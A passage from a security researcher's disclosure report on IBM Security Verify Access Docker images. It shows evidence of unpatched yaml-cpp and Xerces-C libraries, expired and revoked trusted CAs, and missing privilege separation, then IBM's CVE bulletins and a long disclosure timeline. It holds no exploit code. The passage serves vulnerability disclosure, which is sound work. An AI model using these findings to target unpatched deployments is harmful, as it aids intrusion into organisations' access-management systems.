Furthermore, it is possible to analyze the rest of the security patches from the git repository and compare them with the assembly code from the libtivsec_yamlcpp.so library. This allows us to conclude the security patches have not been imported into the libtivsec_yamlcpp.so library.

Source code providing security patches:

Method HandleNode() from the security patches and the patched versions of yaml-cpp:

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

With the assembly code extracted from the libtivsec_yamlcpp.so library and rebuilt into pseudo-code, we can identify the same logic and the same instructions (minus some errors due to the reconstruction from assembly to C++) - with the lack of the patch located on the line 51.

Pseudo-code of method HandleNode():

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

This allows us to conclude that the libtivsec_yamlcpp.so library is vulnerable to these 4 CVEs.

libtivsec_xml4c.so - outdated Xerces-C library

This library (8b3d3d2dcb1152966d097e91e08fa1dc4300f3653f1c264eeecaf20bb1550832) is located in /usr/lib64/libtivsec_xml4c.so and /opt/ibm/Tivoli/SecUtilities/lib/libtivsec_xml4c.so) and uses outdated code from XML4C 5.5.0 that includes a version of Xerces-C (XML4C doesn't exist anymore and the latest release appears to be from 2007-2008).

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

This version appears to be quite outdated and is likely vulnerable to known CVEs (https://xerces.apache.org/xerces-c/secadv.html).

Details - Outdated and untrusted CAs used in the Docker images

It was observed that the Docker images will trust invalid Certificate Authorities (CA).

Using the Paranoia program, we can list the invalid, expired and revoked CAs that are trusted inside the 4 Docker images.

It appears that these 4 Docker images trust some invalid, revoked or untrusted CAs.

Results for ibmcom/verify-access:10.0.4.0:

kali-docker# paranoia inspect ibmcom/verify-access:10.0.4.0
Certificate CN=VeriSign Class 3 Public Primary Certification Authority - G5,OU=VeriSign Trust Network+OU=(c) 2006 VeriSign\, Inc. - For authorized use only,O=VeriSign\, Inc.,C=US
 removed from Mozilla trust store, no reason given

Certificate CN=DigiCert ECC Secure Server CA,O=DigiCert Inc,C=US
 expires soon ( expires on 2023-03-08T12:00:00Z, 19 weeks 2 days until expiry)

Certificate CN=Test CA,O=genua mbh
 expired ( expired on 2014-10-23T08:22:40Z, 8 years 3 days since expiry)

Certificate CN=Cybertrust Global Root,O=Cybertrust\, Inc
 expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)
 removed from Mozilla trust store, comments: June 2015: DigiCert acquired this root cert from Verizon. 

Certificate CN=DST Root CA X3,O=Digital Signature Trust Co. 
 expired ( expired on 2021-09-30T14:01:15Z, 1 year 3 weeks since expiry)
 removed from Mozilla trust store, no reason given

Certificate CN=E-Tugra Certification Authority,OU=E-Tugra Sertifikasyon Merkezi,O=E-Tua EBG Bilim Teknolojileri ve Hizmetleri A.,L=Ankara,C=TR
 expires soon ( expires on 2023-03-03T12:09:48Z, 18 weeks 4 days until expiry)

Certificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign
 expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)
 removed from Mozilla trust store, comments: Ownership transferred to GTS:
https://bug1325532.bmoattachments.org/attachment.cgi?id=8844281

Certificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR
 removed from Mozilla trust store, no reason given

Certificate CN=Staat der Nederlanden EV Root CA,O=Staat der Nederlanden,C=NL
 expires soon ( expires on 2022-12-08T11:10:28Z, 6 weeks 3 days until expiry)

Certificate CN=Global Chambersign Root,OU=http://www.chambersign.org,O=AC Camerfirma SA CIF A82743287,C=EU
 removed from Mozilla trust store, comments: Websites trust bit turned off in NSS 3.35, Firefox 59
https://bugzilla.mozilla.org/show_bug.cgi?id=1410277

Certificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign
 expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)
 removed from Mozilla trust store, comments: Ownership transferred to GTS:
https://bug1325532.bmoattachments.org/attachment.cgi?id=8844281

Certificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR
 removed from Mozilla trust store, no reason given

Certificate CN=Global Chambersign Root,OU=http://www.chambersign.org,O=AC Camerfirma SA CIF A82743287,C=EU
 removed from Mozilla trust store, comments: Websites trust bit turned off in NSS 3.35, Firefox 59
https://bugzilla.mozilla.org/show_bug.cgi?id=1410277

Certificate CN=Cybertrust Global Root,O=Cybertrust\, Inc
 expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)
 removed from Mozilla trust store, comments: June 2015: DigiCert acquired this root cert from Verizon. 

Certificate CN=DST Root CA X3,O=Digital Signature Trust Co. 
 expired ( expired on 2021-09-30T14:01:15Z, 1 year 3 weeks since expiry)
 removed from Mozilla trust store, no reason given

Certificate CN=E-Tugra Certification Authority,OU=E-Tugra Sertifikasyon Merkezi,O=E-Tua EBG Bilim Teknolojileri ve Hizmetleri A.,L=Ankara,C=TR
 expires soon ( expires on 2023-03-03T12:09:48Z, 18 weeks 4 days until expiry)

Certificate CN=DigiNotar PKIoverheid CA Organisatie - G2,O=DigiNotar B.V.,C=NL
 expired ( expired on 2020-03-23T09:50:05Z, 2 years 30 weeks since expiry)

Certificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign
 expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)
 removed from Mozilla trust store, comments: Ownership transferred to GTS:
https://bug1325532.bmoattachments.org/attachment.cgi?id=8844281

Certificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR
 removed from Mozilla trust store, no reason given

Certificate CN=Staat der Nederlanden EV Root CA,O=Staat der Nederlanden,C=NL
 expires soon ( expires on 2022-12-08T11:10:28Z, 6 weeks 3 days until expiry)

Certificate CN=sks-keyservers.net CA,O=sks-keyservers.net CA,ST=Oslo,C=NO
 expired ( expired on 2022-10-07T00:33:37Z, 2 weeks 3 days since expiry)

Found 395 certificates total, of which 21 had issues

Results for:

- ibmcom/verify-access-runtime:10.0.4.0
- ibmcom/verify-access-wrp:10.0.4.0
- ibmcom/verify-access-dsc:10.0.4.0

kali-docker# paranoia inspect ibmcom/verify-access-runtime:10.0.4.0
Certificate CN=Cybertrust Global Root,O=Cybertrust\, Inc
expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)
 removed from Mozilla trust store, comments: June 2015: DigiCert acquired this root cert from Verizon. 

Certificate CN=DST Root CA X3,O=Digital Signature Trust Co. 
expired ( expired on 2021-09-30T14:01:15Z, 1 year 3 weeks since expiry)
 removed from Mozilla trust store, no reason given

Certificate CN=E-Tugra Certification Authority,OU=E-Tugra Sertifikasyon Merkezi,O=E-Tua EBG Bilim Teknolojileri ve Hizmetleri A.,L=Ankara,C=TR
 expires soon ( expires on 2023-03-03T12:09:48Z, 18 weeks 4 days until expiry)

Certificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign
expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)
 removed from Mozilla trust store, comments: Ownership transferred to GTS:
https://bug1325532.bmoattachments.org/attachment.cgi?id=8844281

Certificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR
 removed from Mozilla trust store, no reason given

Certificate CN=Staat der Nederlanden EV Root CA,O=Staat der Nederlanden,C=NL
 expires soon ( expires on 2022-12-08T11:10:28Z, 6 weeks 3 days until expiry)

Certificate CN=Global Chambersign Root,OU=http://www.chambersign.org,O=AC Camerfirma SA CIF A82743287,C=EU
 removed from Mozilla trust store, comments: Websites trust bit turned off in NSS 3.35, Firefox 59

https://bugzilla.mozilla.org/show_bug.cgi?id=1410277
Certificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign
expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)
 removed from Mozilla trust store, comments: Ownership transferred to GTS:
https://bug1325532.bmoattachments.org/attachment.cgi?id=8844281

Certificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR
 removed from Mozilla trust store, no reason given

Certificate CN=Global Chambersign Root,OU=http://www.chambersign.org,O=AC Camerfirma SA CIF A82743287,C=EU
 removed from Mozilla trust store, comments: Websites trust bit turned off in NSS 3.35, Firefox 59

https://bugzilla.mozilla.org/show_bug.cgi?id=1410277
Certificate CN=Cybertrust Global Root,O=Cybertrust\, Inc
expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)
 removed from Mozilla trust store, comments: June 2015: DigiCert acquired this root cert from Verizon. 

Certificate CN=DST Root CA X3,O=Digital Signature Trust Co. 
expired ( expired on 2021-09-30T14:01:15Z, 1 year 3 weeks since expiry)
 removed from Mozilla trust store, no reason given

Certificate CN=E-Tugra Certification Authority,OU=E-Tugra Sertifikasyon Merkezi,O=E-Tua EBG Bilim Teknolojileri ve Hizmetleri A.,L=Ankara,C=TR
 expires soon ( expires on 2023-03-03T12:09:48Z, 18 weeks 4 days until expiry)

Certificate CN=DigiNotar PKIoverheid CA Organisatie - G2,O=DigiNotar B.V.,C=NL
 expired ( expired on 2020-03-23T09:50:05Z, 2 years 30 weeks since expiry)

Certificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign
expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)
 removed from Mozilla trust store, comments: Ownership transferred to GTS:
https://bug1325532.bmoattachments.org/attachment.cgi?id=8844281

Certificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR
 removed from Mozilla trust store, no reason given

Certificate CN=Staat der Nederlanden EV Root CA,O=Staat der Nederlanden,C=NL
 expires soon ( expires on 2022-12-08T11:10:28Z, 6 weeks 3 days until expiry)

Certificate CN=sks-keyservers.net CA,O=sks-keyservers.net CA,ST=Oslo,C=NO
 expired ( expired on 2022-10-07T00:33:37Z, 2 weeks 3 days since expiry)

Found 374 certificates total, of which 18 had issues

The communications used in the ISVA platform use SSL/TLS with a trust entirely based on underlying CAs. Some CAs have been revoked and cannot be trusted anymore.

The presence of revoked and expired CAs also shows that the security of the Docker images is highly perfectible.

Details - Lack of privilege separation in Docker instances

It was observed that the Docker images do not implement privilege separation. Privilege separation is a software-based implementation of the principle of least privilege.

Using dynamic analysis, the ibmcom/verify-access-wrp:10.0.4.0 Docker image, ibmcom/verify-access:10.0.4.0 Docker image, and the ibmcom/verify-access-runtime Docker image do not correctly implement privilege separation.

Processes running inside the ibmcom/verify-access:10.0.4.0 Docker image:

USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
isam           1  0.0  0.0  12060  2812 ?        Ss   Oct21   0:00 /bin/sh /sbin/bootstrap.sh
isam         312  0.0  0.0  24532    56 ?        Ss   Oct21   0:00 /usr/sbin/mesa_crashd
isam         314  0.1  0.0  24568  2056 ?        R    Oct21   6:20 /usr/sbin/mesa_crashd
isam         318  0.0  0.0  69160  2732 ?        Ss   Oct21   0:00 /usr/sbin/mesa_syslogd
isam         322  0.0  0.0  69224  2164 ?        S    Oct21   0:02 /usr/sbin/mesa_syslogd
isam         399  0.0  0.0 102760  2740 ?        Ss   Oct21   0:00 /usr/sbin/mesa_eventsd -m 1000
isam         400  0.0  0.1 711216  8276 ?        Sl   Oct21   0:00 /usr/sbin/mesa_eventsd -m 1000
isam         747  0.0  0.0 270992  7452 ?        Ssl  Oct21   0:06 /usr/sbin/wga_watchdogd slapdw -log_file /var/application.logs.local/verify_access_runtime/user_registry/msg__user_registry.log /usr/sbin/slapd -d 0 -s 0 -h ldap://127.0.0.1:389 ldaps://127.0.0.1:636 -f /etc/openldap/slapd.conf -u ldap -g ldap 
isam         756  0.0  0.0 271124  7308 ?        Ssl  Oct21   0:06 /usr/sbin/wga_watchdogd ISAM-Policy-Server -log_file /var/application.logs.local/verify_access_runtime/policy/msg__pdmgrd.log -cfg /var/PolicyDirector/etc/ivmgrd.conf /opt/PolicyDirector/bin/pdmgrd -foreground
isam         807  0.0  0.0  71488  3084 ?        Ss   Oct21   0:00 /usr/sbin/iss-lum
isam         808  0.0  0.5 343920 42140 ?        Sl   Oct21   0:00 /usr/sbin/iss-lum
isam         833  0.0  0.0 128400  5140 ?        Ssl  Oct21   0:00 /usr/sbin/rsyslogd
isam         873  0.0  0.0 273920  7080 ?        Ssl  Oct21   0:06 /usr/sbin/wga_watchdogd wga_notifications -log_file /var/log/wga_notifications.log wga_notifications -foreground
isam         879  1.5  0.5 563872 42292 ?        Sl   Oct21  71:40 wga_notifications -foreground
isam         892  0.0  0.0  12060  1804 ?        S    Oct21   0:00 /bin/sh /sbin/bootstrap.sh
isam         895  0.0  0.0  23068  1256 ?        S    Oct21   0:00 /usr/bin/coreutils --coreutils-prog-shebang=tail /usr/bin/tail -F -n+0 /var/application.logs.local/lmi/messages.log
isam      573957  0.0  0.0  47620  3696 pts/0    Rs+  16:53   0:00 ps -aux
isam      573963  0.0  0.0  11928  2852 ?        S    16:53   0:00 sh -c ls /var/support/core_*.* | wc -l

pgresql      434  0.0  0.2 188380 17492 ?        Ss   Oct21   0:06 /usr/bin/postgres -D /var/postgresql/config/data
pgresql      435  0.0  0.0 138892  2960 ?        Ss   Oct21   0:00 postgres: logger
pgresql      446  0.0  0.0 188380  2696 ?        Ss   Oct21   0:00 postgres: checkpointer
pgresql      447  0.0  0.0 188516  4676 ?        Ss   Oct21   0:03 postgres: background writer
pgresql      448  0.0  0.0 188380  5148 ?        Ss   Oct21   0:03 postgres: walwriter
pgresql      449  0.0  0.0 189112  5312 ?        Ss   Oct21   0:04 postgres: autovacuum launcher
pgresql      450  0.0  0.0 139024  3016 ?        Ss   Oct21   0:15 postgres: stats collector
pgresql      451  0.0  0.0 188916  5492 ?        Ss   Oct21   0:00 postgres: logical replication launcher

www-data     547  0.3  6.2 4925056 499744 ?      SLl  Oct21  18:57 /opt/java/jre/bin/java -javaagent:/opt/IBM/wlp/bin/tools/ws-javaagent.jar -Djava.awt.headless=true -Djdk.attach.allowAttachSelf=true -Dcom.sun.jndi.ldap.object.disableEndpointIdentification=true -Djava.security.properties=/opt/IBM/wlp/usr/servers/de

ivmgr        761  0.0  0.5 873712 44896 ?        Sl   Oct21   0:04 /opt/PolicyDirector/bin/pdmgrd -foreground
ivmgr        863  0.0  0.1 276544  8440 ?        Sl   Oct21   0:00 /usr/sbin/wga_servertaskd

ldap         752  0.0 10.3 1314228 822572 ?      Sl   Oct21   0:00 /usr/sbin/slapd -d 0 -s 0 -h ldap://127.0.0.1:389 ldaps://127.0.0.1:636 -f /etc/openldap/slapd.conf -u ldap -g ldap

root         813  0.0  0.0  41984  3528 ?        Ss   Oct21   0:01 /usr/sbin/crond
root         862  0.0  0.0 174348  2828 ?        Ss   Oct21   0:00 /usr/sbin/wga_servertaskd

Some processes are running as isam. For example, the rsyslogd processys runs as isam. If a program running as isam is compromised inside an instance, then all the programs running as isam are also compromised.

Processes running inside the ibmcom/verify-access-wrp:10.0.4.0 Docker image:

PID   USER     TIME  COMMAND
    1 isam      9:42 /opt/pdweb/bin/webseald -foreground -noenv -config etc/webseald-login-internal.conf
   32 isam      0:02 slapd -4 -f /etc/openldap/slapd.conf -h ldap://127.0.0.1:6389 -s 0

The only 2 processes are running as isam.

Processes running inside the ibmcom/verify-access-runtime: 10.0.4.0 Docker image:

PID   USER     TIME  COMMAND
    1 isam      1h18 /opt/java/jre/bin/java -javaagent:/opt/ibm/wlp/bin/tools/ws-javaagent.jar -Djava.awt.headless=true -Djdk.attach.allowAttachSelf=true -Dcom.ibm.ws.logging.log.directory=/var/application.logs.local/rtprofile -Xms512m -Xmx2048m -Dcom.sun.security.enableCRLDP=true -Dsun.net.inetaddr.ttl=30 -Dhttps
   38 isam      0:00 slapd -4 -f /etc/openldap/slapd.conf -h ldap://127.0.0.1:6389 -s 0
   63 isam      0:04 /usr/bin/postgres -D /var/postgresql/config/data
   64 isam      0:00 postgres: logger   
   66 isam      0:00 postgres: checkpointer   
   67 isam      0:00 postgres: background writer   
   68 isam      0:00 postgres: walwriter   
   69 isam      0:01 postgres: autovacuum launcher   
   70 isam      0:05 postgres: stats collector   
   71 isam      0:00 postgres: logical replication launcher   
37169 isam      0:00 bash
37186 isam      0:00 ps -a

In the ibmcom/verify-access-runtime instance, we can confirm the postgres daemon is running. We can also confirm a complete lack of privilege separation: everything is running as isam.

If a program running as isam is compromised inside an instance, then the all the programs running as isam are also compromised.

Vendor Response

IBM provided several security bulletins:

Security Bulletin: IBM Security Verify Access is vulnerable to multiple Security Vulnerabilities - https://www.ibm.com/support/pages/node/7158790:

- CVE-2023-38371: IBM Security Access Manager uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information.
- CVE-2024-35137: IBM Security Access Manager Appliance could allow a local user to possibly elevate their privileges due to sensitive configuration information being exposed.
- CVE-2024-35139: IBM Security Verify Access could allow a local user to obtain sensitive information from the container due to incorrect default permissions.
- CVE-2023-30998: IBM Security Access Manager Container could allow a local user to obtain root access due to improper access controls.
- CVE-2023-30997: IBM Security Access Manager Container could allow a local user to obtain root access due to improper access controls.
- CVE-2023-38368: IBM Security Access Manager Container could disclose sensitive information to a local user to do improper permission controls.
- CVE-2023-38370: IBM Security Access Manager Container, under certain configurations, could allow a user on the network to install malicious packages.

Security Bulletin: Security Vulnerabilities discovered in IBM Security Verify Access - https://www.ibm.com/support/pages/node/7145400:

- CVE-2024-25027: IBM Security Verify Access could disclose sensitive snapshot information due to missing encryption.

Security Bulletin: Multiple Security Vulnerabilities were identified in IBM Security Verify Access - https://www.ibm.com/support/pages/node/7106586:

- CVE-2023-31003: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.6.1) could allow a local user to obtain root access due to improper access controls.
- CVE-2023-31001: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.6.1) temporarily stores sensitive information in files that could be accessed by a local user.
- CVE-2023-38267: IBM Security Access Manager Appliance (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.6.1) could allow a local user to obtain sensitive configuration information.
- CVE-2023-31005: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow a local user to escalate their privileges due to an improper security configuration.
- CVE-2023-30999: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow an attacker to cause a denial of service due to uncontrolled resource consumption.
- CVE-2023-43016: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow a remote user to log into the server due to a user account with an empty password.
- CVE-2023-32327: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources.
- CVE-2023-32329: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow a user to download files from an incorrect repository due to improper file validation.
- CVE-2023-31004: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow a remote attacker to gain access to the underlying system using man in the middle techniques.
- CVE-2023-31006: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) is vulnerable to a denial of service attacks on the DSC server.
- CVE-2023-32328: IBM Security Verify Access 10.0.0.0 through 10.0.6.1 uses insecure protocols in some instances that could allow an attacker on the network to take control of the server.
- CVE-2023-32330: IBM Security Verify Access 10.0.0.0 through 10.0.6.1 uses insecure calls that could allow an attacker on the network to take control of the server.
- CVE-2023-43017: IBM Security Verify Access 10.0.0.0 through 10.0.6.1 could allow a privileged user to install a configuration file that could allow remote access.
- CVE-2023-31002: IBM Security Access Manager Container 10.0.0.0 through 10.0.6.1 temporarily stores sensitive information in files that could be accessed by a local user.
- CVE-2023-38369: IBM Security Access Manager Container 10.0.0.0 through 10.0.6.1 does not require that docker images should have strong passwords by default, which makes it easier for attackers to compromise user accounts.

Security Bulletin: Multiple Security Vulnerabilities were discovered in IBM Security Verify Access Container (CVE-2024-35140, CVE-2024-35141, CVE-2024-35142) - https://www.ibm.com/support/pages/node/7155356:

- CVE-2024-35140: IBM Security Verify Access could allow a local user to escalate their privileges due to improper certificate validation.
- CVE-2024-35141: IBM Security Verify Access could allow a local user to escalate their privileges due to execution of unnecessary privileges.
- CVE-2024-35142: IBM Security Verify Access could allow a local user to escalate their privileges due to execution of unnecessary privileges.

Report Timeline

October 2022: Security assessment performed on IBM Security Verify Access.
Feb 12, 2023: A complete report was sent to IBM.
Feb 13, 2023: IBM acknowledged the reception of the security assessment and said that scan tools usually report a lot of issues so I have to check the status of detected CVEs by browsing RedHat webpages and create an issue for each CVE.
Feb 13, 2023: Replied to IBM saying that the security assessment was not done using a scanner.
Feb 14, 2023: Asked for an update.
Feb 14, 2023: IBM confirmed that the report was shared with L3 and "IBM hacking team".
Feb 22, 2023: IBM said they were still assessing the report.
Mar 13, 2023: An additional report on ibmsecurity was sent to IBM.
Mar 13, 2023: IBM confirmed that the second report was shared with L3 team.
Mar 15, 2023: IBM wanted to organize a meeting about the findings.
Mar 15, 2023: I replied that I would like to have a written feedback for each reported vulnerability in order to have constructive discussion.
Apr 4, 2023: I asked again IBM to confirm the vulnerabilities
Apr 5, 2023: IBM shared the analysis (VulnerabilityResponse.xlsx), confirming several vulnerabilities.
Apr 11, 2023: I provided my comments (VulnerabilityResponse-comments-Pierre.xlsx) and asked to organize a meeting.
Apr 11, 2023: IBM confirmed a meeting is possible.
Apr 18, 2023: I asked to organize a meeting on Apr 19, 2023.
Apr 18, 2023: IBM confirmed a meeting is possible.
Apr 19, 2023: I asked to have a meeting where every party (dev team, support and myself) can be present.
Apr 19, 2023: IBM confirmed a meeting would take place on Apr 20, 2023.
Apr 20, 2023: Meeting with IBM regarding ISVA. IBM confirmed they would recheck some of the issues and would provide CVEs for the vulnerabilities.
Apr 23, 2023: I asked to have a second meeting about ibmsecurity.
Apr 23, 2023: IBM confirmed they will organize a meeting on ibmsecurity.
Apr 24, 2023: I asked the timeline to get security patches.
Apr 24, 2023: IBM confirmed there are no ETA to get security patches.
Apr 27, 2023: Meeting with IBM regarding ibmsecurity. IBM confirmed they will fix all the issues.
May 10, 2023: I asked for CVE identifiers to track the vulnerabilities.
May 11, 2023: IBM said that PSIRT records have been opened and the scoring is in progress.
May 15, 2023: I reached IBM because I found a CVE (CVE-2023-25927) and a security bulletin likely corresponding to a vulnerability I reported, thanks to @CVEnew on Twitter: https://www.ibm.com/support/pages/node/6989653. I asked if this was one of the reported vulnerabilities.
Jul 7, 2023: IBM said the dev team was still working on the final list of issues and that everything would be fixed in the 10.0.7 release.
Jul 10, 2023: I asked when the 10.0.7 release would be available. I asked again more details about the previous advisory.
Jul 11, 2023: IBM said that the 10.0.7 release would be published on Dec 23, 2023. Regarding the CVEs, IBM replied they would need to discuss with the dev team.
Jul 12, 2023: I asked IBM to confirm if CVE-2023-25927 was one of the reported vulnerabilities.
Jul 12, 2023: IBM said that they do not credit security researchers.
Jul 13, 2023: I provided several IBM security bulletins where security researchers were credited, e.g. https://www.ibm.com/support/pages/security-bulletin-vulnerabilities-exist-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430.
Jul 14, 2023: IBM confirmed that they would forward the information to L3 team and asked what I would want to do with this case.
Jul 14, 2023: I said that (1) I was still waiting for information about CVE-2023-25927, (2) I did not have any information regarding security patches for ibmsecurity and (3) I asked IBM to provide me with the final list of vulnerabilities that would be patched in the 10.0.7. Since the list of confirmed vulnerabilities was quite long, I wanted to confirm that nothing was missed.
Jul 28, 2023: IBM said that they did not know if CVE-2023-25927 is one of the reported vulnerabilities and in any case, it is impossible to edit the security bulletin and give credits.
Aug 16, 2023: IBM asked if additional assistance was required [NB: IBM likely wanted to close this ticket while no security patches were published].
Aug 17, 2023: I asked again information about ibmsecurity and CVE-2023-25927.
Oct 20, 2023: IBM said they were still analysing the requests (final list of patched vulnerabilties, security patches of ibmsecurity and status of CVE-2023-25927).
Oct 25, 2023: IBM asked to organize a meeting.
Oct 25, 2023: I replied that I was still waiting for the final list of vulnerabilities that would be fixed in version 10.0.7. There was also no information regarding security patches for ibmsecurity.
Oct 25, 2023: IBM replied they wanted to discuss about the vulnerabilities in a meeting.
Oct 29, 2023: IBM asked to organize a meeting again.
Oct 30, 2023: I accepted the meeting and I asked IBM to provide the list of vulnerabilities that would be patched with their current status. I also asked the status of ibmsecurity.
Oct 30, 2023: IBM asked to have a meeting on Nov 7, 2023.
Nov 2, 2023: I confirmed my presence to the meeting.
Nov 5, 2023: IBM confirmed the meeting.
Nov 7, 2023: Meeting with IBM. IBM provided me with a new report containing new feedbacks for several vulnerabilities. Also IBM confirmed that several vulnerabilities would be patched in 2024 and ibmsecurity would be patched in December 2023. IBM asked me to review a specific vulnerability that appears to be invalid (V-[REDACTED] - Insecure SSLv3 connections to the DSC servers).
Nov 21, 2023: IBM asked me to review the new report shared by IBM.
Nov 28, 2023: IBM asked for updates.
Dec 4, 2023: I answered that I did not have anymore access to the test infrastructure and IBM had to wait for my analysis until I get again access to the test infrastructure.
Dec 4, 2023: IBM asked me to check the vulnerabilities as soon as possible.
Dec 21, 2023: I got access to a test infrastructure and reviewed some vulnerabilities.
Dec 21, 2023: I sent a new analysis to IBM, containing details of 4 vulnerabilities.
Dec 27, 2023: IBM confirmed the reception of the new analysis.
Jan 15, 2024: IBM asked me to update ISVA and recheck all the vulnerabilities.
Jan 16, 2024: I asked IBM if ibmsecurity was also patched.
Jan 16, 2024: IBM confirmed that a new case must be opened for ibmsecurity to get security patches(!).
Jan 22, 2024: IBM wanted to organize a new meeting.
Jan 22, 2024: I replied that I failed to understand the issue with the ibmsecurity library and that I had a written confirmation by IBM that security patches would be provided. The vulnerabilities found in ibmsecurity were reported in March 2023 (10 months ago).
Jan 22, 2024: I informed IBM that I discovered(!) a new security bulletin thanks to @CVEnew: https://www.ibm.com/support/pages/node/7106586, but only 15 vulnerabilities were listed instead of the 35 vulnerabilities confirmed by IBM. I asked IBM to clarify the situation as it looked like less than half of vulnerabilities were indeed patched.
Jan 24, 2024: IBM created a new case for ibmsecurity.
Jan 29, 2024: IBM confirmed that 5 vulnerabilities had not been patched in the latest version (10.0.7).
Jan 29, 2024: I reached IBM to get the status of 15 unpatched vulnerabilities. I provided the updated analysis to IBM.
Feb 7, 2024: IBM confirmed that some of the vulnerabilities were "being processed" and that some of vulnerabilities had been also silently patched and no security bulletins had been published.
Feb 20, 2024: IBM asked for updates.
Feb 20, 2024: I asked when would be the release date for ISVA 10.0.8 and the complete list of vulnerabilities that would be patched in this release.
Feb 20, 2024: IBM confirmed that the 10.0.8 release would be published in mid-2024.
Feb 23, 2024: I sent a new vulnerability to IBM "Authentication Bypass on IBM Security Verify Runtime".
Feb 23, 2024: IBM confirmed the reception of the vulnerability and asked to close the ticket.
Feb 23, 2024: I said that since some vulnerabilities had not been patched, the ticket must stay open.
Feb 23, 2024: IBM said that they cannot keep the ticket open and they needed to close it.
Feb 23, 2024: I explained that the vulnerabilities were reported over a year ago and IBM confirmed they had not fully fixed in the latest version and that some vulnerabilities were also still under evaluation. I said that I would agree to close this ticket if IBM could confirm that all vulnerabilities reported in the ticket had been correctly fixed in the latest version. I also asked IBM to provide the corresponding security bulletins.
Feb 27, 2024: Regarding the authentication bypass, IBM replied that the runtime was supposed to be in the intranet zone.
Feb 28, 2024: I asked IBM to clarify where in the documentation specified that the runtime should not be exposed. For example, in https://www.ibm.com/docs/en/sva/10.0.7?topic=support-docker-image-verify-access-runtime, it was not explained that exposing this runtime on the network was a high security risk.
Mar 4, 2024: Regarding the vulnerabilities found in ibmsecurity, IBM said that any security vulnerability found in ibmsecurity must be reported by opening an issue in the Github repository.
Mar 8, 2024: IBM confirmed they were able to reproduce the authentication bypass vulnerability.
Mar 12, 2024: IBM confirmed they would add an optional MTLS authentication in the next release (10.0.8) and they would update the ISVA documentation to block any attempt of the authentication bypass vulnerability.
Mar 29, 2024: IBM published a new security bulletin: https://www.ibm.com/support/pages/node/7145400.
Mar 29, 2024: IBM confirmed that any security vulnerability found in ibmsecurity must be reported by opening an issue in the Github repository.
Apr 1, 2024: Creation of https://github.com/IBM-Security/ibmsecurity/issues/416.
Apr 2, 2024: IBM confirmed the reception of the report https://github.com/IBM-Security/ibmsecurity/issues/416#issuecomment-2032110397.
Apr 3, 2024: https://github.com/IBM-Security/ibmsecurity/issues/416 was entirely redacted by IBM.
Apr 5, 2024: I asked if the vulnerabilities would be patched in the #416 issue (https://github.com/IBM-Security/ibmsecurity/issues/416).
Apr 6, 2024: Issue #416 (https://github.com/IBM-Security/ibmsecurity/issues/416) closed.
Apr 6, 2024: I added again the content of https://github.com/IBM-Security/ibmsecurity/issues/416 and asked if CVEs would be published.
Apr 10, 2024: Security bulletin for ibm security published: https://www.ibm.com/support/pages/node/7147932.
